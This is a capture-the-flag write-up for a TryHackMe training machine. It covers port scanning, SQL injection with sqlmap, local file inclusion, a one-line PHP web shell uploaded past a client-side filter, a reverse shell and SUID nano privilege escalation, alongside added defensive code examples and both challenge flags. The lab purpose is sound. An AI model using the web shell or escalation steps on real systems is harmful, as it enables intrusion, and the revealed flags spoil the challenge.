
THM - Expose

· 11 min read
Strider

Intro

Hi, after some time I'm writing another small write-up. Today it's about the CTF "Expose", which can be found on the TryHackMe platform. You have to find two flags in this challenge. Simply create an account there, and off you go 😄

Discovery

Ok, let's go! The first thing I did was run an nmap scan against the target IP address 10.10.180.99 (a full-port scan with service and OS detection, default scripts and traceroute, as the output shows). After some time I got the results below, which look interesting.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-10-01 16:40 CEST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating Ping Scan at 16:40
Scanning 10.10.180.99 [4 ports]
Completed Ping Scan at 16:40, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:40
Completed Parallel DNS resolution of 1 host. at 16:40, 0.04s elapsed
Initiating SYN Stealth Scan at 16:40
Scanning 10.10.180.99 [65535 ports]
Discovered open port 22/tcp on 10.10.180.99
Discovered open port 53/tcp on 10.10.180.99
Discovered open port 21/tcp on 10.10.180.99
Discovered open port 1337/tcp on 10.10.180.99
Discovered open port 1883/tcp on 10.10.180.99
Completed SYN Stealth Scan at 16:40, 17.52s elapsed (65535 total ports)
Initiating Service scan at 16:40
Scanning 5 services on 10.10.180.99
Completed Service scan at 16:40, 11.23s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 10.10.180.99
Retrying OS detection (try #2) against 10.10.180.99
Retrying OS detection (try #3) against 10.10.180.99
Retrying OS detection (try #4) against 10.10.180.99
Retrying OS detection (try #5) against 10.10.180.99
Initiating Traceroute at 16:40
Completed Traceroute at 16:40, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 16:40
Completed Parallel DNS resolution of 2 hosts. at 16:40, 0.08s elapsed
NSE: Script scanning 10.10.180.99.
Initiating NSE at 16:40
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 16:40, 8.68s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.37s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.01s elapsed
Nmap scan report for 10.10.180.99
Host is up (0.045s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.4.174
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ca:24:e4:a3:07:8b:bb:9f:e6:57:4f:5b:6e:30:d3:d2 (RSA)
| 256 1c:c5:28:08:0a:2c:5f:b2:55:8f:ba:9e:24:12:82:2f (ECDSA)
|_ 256 cd:e2:e2:92:ee:bf:59:03:fa:af:8a:f7:fb:f9:40:68 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
1337/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: EXPOSED
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
1883/tcp open mosquitto version 1.6.9
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/load/publish/sent/1min: 28.32
| $SYS/broker/load/messages/received/15min: 0.20
| $SYS/broker/load/messages/received/5min: 0.58
| $SYS/broker/clients/active: 1
| $SYS/broker/bytes/received: 69
| $SYS/broker/load/bytes/received/1min: 60.29
| $SYS/broker/clients/maximum: 1
| $SYS/broker/messages/stored: 36
| $SYS/broker/clients/connected: 1
| $SYS/broker/subscriptions/count: 2
| $SYS/broker/clients/disconnected: 0
| $SYS/broker/load/connections/1min: 1.67
| $SYS/broker/load/sockets/5min: 0.38
| $SYS/broker/load/messages/sent/5min: 6.67
| $SYS/broker/load/publish/sent/5min: 6.09
| $SYS/broker/clients/inactive: 0
| $SYS/broker/publish/messages/sent: 31
| $SYS/broker/heap/maximum: 52384
| $SYS/broker/load/bytes/received/15min: 4.56
| $SYS/broker/load/sockets/1min: 1.55
| $SYS/broker/load/messages/received/1min: 2.59
| $SYS/broker/load/connections/15min: 0.13
| $SYS/broker/load/publish/sent/15min: 2.05
| $SYS/broker/bytes/sent: 1219
| $SYS/broker/uptime: 649 seconds
| $SYS/broker/load/connections/5min: 0.39
| $SYS/broker/heap/current: 51984
| $SYS/broker/load/sockets/15min: 0.13
| $SYS/broker/store/messages/count: 36
| $SYS/broker/store/messages/bytes: 156
| $SYS/broker/retained messages/count: 39
| $SYS/broker/publish/bytes/sent: 129
| $SYS/broker/load/bytes/sent/1min: 1113.17
| $SYS/broker/load/bytes/sent/15min: 80.77
| $SYS/broker/messages/sent: 34
| $SYS/broker/load/bytes/received/5min: 13.42
| $SYS/broker/version: mosquitto version 1.6.9
| $SYS/broker/load/bytes/sent/5min: 239.36
| $SYS/broker/messages/received: 3
| $SYS/broker/load/messages/sent/15min: 2.25
| $SYS/broker/load/messages/sent/1min: 30.91
|_ $SYS/broker/clients/total: 1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=10/1%OT=21%CT=1%CU=38251%PV=Y%DS=2%DC=T%G=Y%TM=6519
OS:84F8%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)O
OS:PS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508S
OS:T11NW7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)E
OS:CN(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%
OS:CD=S)

Uptime guess: 36.921 days (since Fri Aug 25 18:34:07 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 43.17 ms 10.11.0.1
2 44.47 ms 10.10.180.99

NSE: Script Post-scanning.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.26 seconds
Raw packets sent: 65809 (2.900MB) | Rcvd: 65733 (2.633MB)

Well, there are some interesting ports open! vsftpd on port 21, which also allows anonymous login; definitely the service I want to check out first. DNS (BIND 9.16.1) on TCP port 53, which may allow zone transfers. An HTTP server (Apache 2.4.41) on port 1337, which I should open in my browser. The last service is Mosquitto 1.6.9 on port 1883, an MQTT message broker mostly used for IoT. Interesting that nmap already lists several topics: the fact that the script could subscribe at all means the broker accepts unauthenticated clients, although everything shown so far is $SYS/ broker statistics that Mosquitto publishes about itself.

First of all I want to look at the files hosted on FTP. Nah, we've got nothing.

(screenshot: dia1.png)

I also tried to upload something and got the error message "permission denied". Well, this service is useless at this point, but maybe it becomes useful later.

Zone transfers with...

dig axfr 10.10.180.99

also didn't work for me, and neither did other DNS requests. (Worth keeping in mind: dig's axfr query type expects a zone name as the query and the name server given with @, so as written this command doesn't actually ask 10.10.180.99 for a zone; it's worth retrying against the server once a domain name turns up.) That told me I had to look at the HTTP service on port 1337 instead.

Visiting port 1337 with my web browser shows me this page.

(screenshot: dia2.png)

At the same time I ran nikto to discover additional information about the HTTP server on port 1337.

(screenshot: dia2.png)

Well, we see that there is an /admin directory.

At the same time gobuster tells me there is also a /phpmyadmin folder. Is that the intended path of the challenge, that I have to break into phpMyAdmin somehow? First, though, I want to find out what is behind the path /admin.

(screenshot: dia4.png)

Visiting the URL "http://10.10.180.99:1337/admin/" shows me this nice login.

(screenshot: dia5.png)

After a few attempts to provoke an error by entering dummy credentials, I started to wonder: what if this login panel is fake? So I decided to see what I'd find under the path /phpmyadmin. It was what I expected: phpMyAdmin. That was my trigger to look up the phpMyAdmin version and search for known vulnerabilities, hoping to find a suitable exploit. But nothing!

(screenshot: dia6.png)

I decided to subscribe to all topics on the MQTT service on port 1883; maybe I'd get more information.

(screenshot: dia7.png)

Some minutes later I got suspicious: had I overlooked something? I started gobuster again with a different wordlist to brute-force directories, hoping to find more. This time I used the default wordlists from dirb to enumerate the directories.

And yes, I got more directories to look at.

(screenshot: dia8.png)

The first directory I want to check out is admin_101; maybe that's the non-fake admin panel. Before I do that, I add an /etc/hosts entry mapping expose.thm to the IP address.

(screenshot: dia9.png)

Well, we see that the email field is pre-filled with the address "hacker@root.thm". Could root.thm be the real domain of the VM? I also added an entry to /etc/hosts pointing root.thm to that IP address. I will enumerate DNS subdomains with wfuzz later.

Well, I entered the single character a as the password for that user and got an error. In the console of the developer tools I can see that an SQL query was returned in the response. An application that echoes its own SQL statement in an error response is a strong sign that user input reaches the query unsanitized.

(screenshot: dia10.png)

Ok, for me it's time to fire up sqlmap to test whether there is an SQL injection vulnerability. A few minutes later sqlmap reported that the parameter email is vulnerable and that I could dump the entire database.

(screenshot: dia11.png)

And it's done. The whole database expose was dumped.

(screenshot: dia12.png)
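To make the bug class behind that leaked query concrete, here is an added example (my own illustration, not code from the challenge or the write-up). It uses an in-memory SQLite table as a stand-in for the target's "user" table; the row contents are constructed placeholders. login_vulnerable() pastes input into the SQL string and hands the query back in its error message, which is the behaviour the developer console revealed; login_safe() is the parameterised form that sqlmap would not get through.

```python
import sqlite3

# Constructed data: a "user" table shaped like the one dumped in the write-up.
# The password value is a placeholder, not the real one from the target.
SEED_ROWS = [
    ("hacker@root.thm", "placeholder-password"),
    ("other@root.thm", "another-placeholder"),
]


def build_db():
    """In-memory SQLite stand-in for the target's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (email TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)", SEED_ROWS)
    return conn


def login_vulnerable(conn, email, password):
    """The bug class from the write-up: input is pasted into the SQL text.

    Returns (email_or_None, detail). On a database error the detail carries
    both the driver message and the full query, which is the kind of leak
    seen in the target's error response."""
    sql = ("SELECT email FROM user WHERE email = '%s' AND password = '%s'"
           % (email, password))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return None, "error: %s -- in query: %s" % (exc, sql)
    return (row[0] if row else None), sql


def login_safe(conn, email, password):
    """Parameterised version: values travel separately from the statement,
    so a quote or comment sequence in the input cannot change its structure."""
    row = conn.execute(
        "SELECT email FROM user WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    # A stray quote breaks the statement and the error leaks the whole query.
    print(login_vulnerable(db, "hacker@root.thm'", "a"))
    # A classic tautology plus a comment logs in as the first row without a password.
    print(login_vulnerable(db, "' OR 1=1-- ", "anything"))
    # The same payload against the parameterised query matches nothing.
    print(login_safe(db, "' OR 1=1-- ", "anything"))
```

The take-away for the defender is the second function: once values are bound as parameters there is no string for sqlmap to break out of, and the error path should log the statement server-side rather than return it to the browser.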

Initial access

The user hacker@root.thm really exists in the table user, and his password is stored in cleartext in that table.

The table config looks pretty interesting because of the password hash and the file paths it contains.

The first file, /file1010111/index.php, sounds interesting; maybe there's a hidden admin panel. The second file, /upload-cv00101011/index.php, sounds like arbitrary file upload, but there's more: according to the table, this file can only be used by a user whose name starts with the letter z.

Well, I have to try the credentials on the admin panel.

(screenshot: dia13.png)

Ok, a pretty nice start page greets me. It looks something like "ChatGPT". I analyzed the source code of this page, but there was nothing. I think this is not the right way, and I have to look at the other two files listed in the config table. The first file I visited was /file1010111/index.php, using the password from the config table, and I got this page.

(screenshot: dia15.png)

Well, the page tells me "Parameter fuzzing is also important :) or Can you hide DOM elements?". I looked at the source code of this page and found the hint that there is a GET parameter named file or view.

(screenshot: dia16.png)

I tried the parameter file first; maybe I've found an LFI? The first thing I tried was to include the file /etc/passwd from the target machine (the usual first probe, since it is world-readable and has an unmistakable format), and yes, it looks like an LFI. I saved the contents of this file and analyzed which users I could possibly find on that system.

There are two users that I may be able to use to upgrade my shell once I get initial access.

(screenshot: dia17.png)

The first user is ubuntu and the second is zeamkish, which starts with the letter z.
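Picking the login-capable accounts out of a passwd file is something you do on every LFI, so here is an added example of that analysis step (my own code, not from the write-up). The passwd excerpt is constructed: it reuses the two account names the challenge revealed, ubuntu and zeamkish, but the UIDs, GECOS fields and the service accounts around them are assumptions. The parser tolerates non-passwd lines because LFI output usually arrives wrapped in the page's HTML, and the prefix filter applies the "starts with z" hint from the config table.

```python
# Constructed /etc/passwd excerpt for the example: the two account names from
# the write-up (ubuntu, zeamkish) plus typical service accounts. The UIDs,
# GECOS fields and the service accounts are assumptions, not the target's data.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mosquitto:x:111:115::/var/lib/mosquitto:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
zeamkish:x:1001:1001:,,,:/home/zeamkish:/bin/bash
"""

# Shells that mean "no interactive login possible".
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync", ""}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts, skipping anything that isn't 7 fields.

    LFI output is frequently wrapped in the page's HTML, so tolerating stray
    lines matters more than strictness here."""
    users = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, gecos, home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            continue
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def interactive_users(text, min_uid=1000, prefix=None):
    """Names of accounts that can log in interactively: a real shell and a
    UID in the human range (root, UID 0, is deliberately left out here).
    `prefix` narrows the list, e.g. "z" for the hint from the config table."""
    return [u["name"] for u in parse_passwd(text)
            if u["uid"] >= min_uid
            and u["shell"] not in NOLOGIN_SHELLS
            and (prefix is None or u["name"].startswith(prefix))]


if __name__ == "__main__":
    print(interactive_users(SAMPLE_PASSWD))              # ['ubuntu', 'zeamkish']
    print(interactive_users(SAMPLE_PASSWD, prefix="z"))  # ['zeamkish']
```

On a real box the same function is worth running with a lower min_uid as well: distributions occasionally give service accounts a login shell, and those are candidates too.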

I visited the second file, entered the username as the password, and voilà, I'm in.

(screenshot: dia19.png)

Ok, I have a file upload here. Maybe there is a chance of arbitrary file upload, where I can upload a shell. I created a simple PHP web shell with the following code:

<?php echo system($_GET['id']);?>

I saved this shell as shell.php.png to get past the extension filter. Then, with Burp Suite's Repeater, I edited the upload request so that the file was sent as a .php file again. And it worked! Since renaming the file in the intercepted request was enough, the extension check was evidently enforced only on the client side; the server stored whatever name it was given.

(screenshot: dia20.png)
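Since the bypass above is really a story about where the check ran, here is an added example (my own code, not the challenge's upload handler, whose source is not known from the write-up) showing the weak name-suffix check next to a server-side validation that the Repeater trick would not get past. The allowed types and their magic bytes are a constructed allowlist for a "CV upload" form.

```python
import os
import secrets

# Extension -> leading bytes the file must start with. Constructed allowlist
# for a "CV upload" form; the real target's rules are not known from the write-up.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}


def client_side_check(filename):
    """The weak check the write-up bypassed: it looks only at how the name ends.
    On the target it also ran in the browser, so an intercepting proxy can
    rename the file after the check has already passed."""
    return filename.lower().endswith(tuple("." + ext for ext in MAGIC))


def server_side_accept(filename, content):
    """Validate an upload on the server and return the name to store it under.

    Raises ValueError on anything suspicious. Three properties matter:
    - only the final extension counts and it must be on the allowlist, so
      shell.php is rejected outright;
    - the content must begin with the magic bytes of the claimed type, so
      shell.php.png carrying PHP source is rejected too;
    - the stored name is random, so the client-chosen name never reaches disk.
    The upload directory must additionally be served without script
    execution; that is web-server configuration and not shown here."""
    base = os.path.basename(filename)            # drop any path components
    _stem, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in MAGIC:
        raise ValueError("extension not allowed: %r" % base)
    if not content.startswith(MAGIC[ext]):
        raise ValueError("content does not look like a %s file" % ext)
    return "%s.%s" % (secrets.token_hex(16), ext)


if __name__ == "__main__":
    php = b"<?php system($_GET['id']); ?>"
    print(client_side_check("shell.php.png"))   # True: the browser-side check is happy
    for name, data in (("shell.php.png", php), ("shell.php", php)):
        try:
            server_side_accept(name, data)
        except ValueError as err:
            print("rejected:", err)
    print(server_side_accept("cv.png", MAGIC["png"] + b"\x00" * 16))
```

Note that magic-byte matching alone is not enough for an image that later reaches a PHP interpreter (a PNG with PHP appended still starts with the right bytes); the random name plus a no-execute upload directory is what actually removes the web-shell path.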

The next thing I did was create a reverse shell payload with msfvenom to get a better shell for initial access to the files on that system.

(screenshot: dia21.png)

With the same method I uploaded the shell and got a command shell session in Metasploit. Nice.

(screenshot: dia22.png)

First flag

After getting initial access, I decided to read the files of the admin panel to get the database credentials, which I can use for phpMyAdmin.

(screenshot: dia23.png)

(screenshot: dia24.png)

I don't know why, but I also listed the home directories of both users and found a file called ssh_creds.txt that everyone can read, including me!

(screenshot: dia25.png)

With these credentials I got a shell via SSH, which is definitely better than the reverse shell.

(screenshot: dia26.png)

The first thing I did was read the file flag.txt.

User:THM{USER_FLAG_1231_EXPOSE}

Escalating privileges

The next logical step is to escalate privileges to get root. The first thing I did was enumerate all SUID binaries.

Searched and found! Why is the editor nano listed as a SUID binary?

(screenshot: dia27.png)

Ok, well done, I would say. I used the editor to read the file /etc/shadow, which holds the password hashes of all users on that system. (They are hashes, not the passwords themselves, but being able to read that file at all proves the SUID nano runs with root's privileges.)

(screenshot: dia28.png)

Now that I effectively have root privileges through the SUID editor, I want to make them persistent for my current user zeamkish. I simply edited the file /etc/sudoers to grant this user root via sudo. (Careful here: a syntax error in /etc/sudoers disables sudo for everyone on the box, so keep the added line minimal and double-check it before saving.)
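The SUID enumeration that exposed nano is worth automating, so here is an added example of that step (my own code, not the command from the write-up): it walks a filesystem, collects regular files with the SUID bit, and flags those whose program name belongs to a set of editors and interpreters that should never be SUID, nano included. The list of risky names is my own choice, and build_demo_tree() creates a constructed fixture in a temporary directory so the code can be exercised without scanning a real box.

```python
import os
import stat
import tempfile

# Programs that must never carry the SUID bit: each of them lets the caller
# read or write arbitrary files (or spawn a shell) as the file owner. nano is
# the one found in the write-up; the rest are the usual offenders (my list).
RISKY_NAMES = {"nano", "vim", "vi", "less", "more", "cat", "cp", "mv", "tee",
               "find", "env", "bash", "sh", "python", "perl", "awk"}


def find_suid(root="/"):
    """Walk `root` and return sorted (path, owner_uid, mode) for every regular
    file with the SUID bit set. Symlinks are not followed; unreadable
    directories are skipped instead of aborting the scan."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return sorted(hits)


def risky_suid(hits):
    """Subset of find_suid() results whose program name is in RISKY_NAMES,
    tolerating version suffixes (python3.8 -> python, vim.basic -> vim)."""
    flagged = []
    for path, _uid, _mode in hits:
        base = os.path.basename(path)
        stem = base.split(".")[0].rstrip("0123456789")
        if base in RISKY_NAMES or stem in RISKY_NAMES:
            flagged.append(path)
    return flagged


def build_demo_tree():
    """Constructed fixture: a temp dir holding a fake SUID nano, a SUID cat and
    a plain ls, so the scanner can be demonstrated without touching the host."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("nano", 0o4755), ("cat", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for path, uid, mode in find_suid(demo):
        print("%o uid=%d %s" % (mode, uid, path))
    print("risky:", risky_suid(find_suid(demo)))
    # On a real host: print(risky_suid(find_suid("/")))
```

As a defender, the same scan belongs in a periodic integrity check: a SUID bit on an editor is a misconfiguration that never has a legitimate reason, and it turns every local user into root exactly as shown above.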

Rootflag

(screenshot: dia29.png)

Now I only have to run sudo -i and I should be logged in as root.

(screenshot: dia30.png)

I'm root, and here is the root flag:

root:THM{ROOT_EXPOSED_1001}

That concludes the challenge.

This challenge was fun to do, and I found it very refreshing. So for beginners it is definitely recommended 😄

I hope you enjoyed it and see you next time 😄